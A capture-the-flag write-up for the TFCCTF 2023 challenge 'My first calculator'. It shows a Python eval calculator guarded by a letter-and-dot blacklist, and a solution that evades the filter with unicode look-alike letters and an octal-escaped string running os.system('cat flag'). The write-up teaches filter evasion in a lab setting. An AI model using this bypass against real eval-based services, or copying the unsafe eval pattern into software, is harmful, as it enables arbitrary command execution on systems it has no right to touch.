- Published on
TFCCTF 2023 – My first calculator
- Authors
- Name
- Lumy
My first calculator (50 points, 116 solves)
Heard that eval is dangerous and made sure it is secure this time
Table of Contents
Source code
import sys
print("This is a calculator")
inp = input("Formula: ")
sys.stdin.close()
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
if any(x in inp for x in blacklist):
print("Nice try")
exit()
fns = {
"pow": pow
}
print(eval(inp, fns, fns))
We can see that all letters and "." are filtered. We have to find a way to evaluate code bypassing the blacklist.
Solution
To escape letters filter, we can use unicode encoding and also octal char representation as below :
Website for string to unicode encoding : qaz.wtf/u/convert.cgi
Website for string to octal encoding : onlinestringtools.com/convert-string-to-octal
Here is the string representation of the payload used :
exec(eval(__import__('os').system('cat flag')))
As the "." is filtered, we have to represent this char using octal, and we have to convert the "exec" string into unicode
𝘦𝘹𝘦𝘤("\145\166\141\154\50\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\143\141\164\40\146\154\141\147\47\51\51")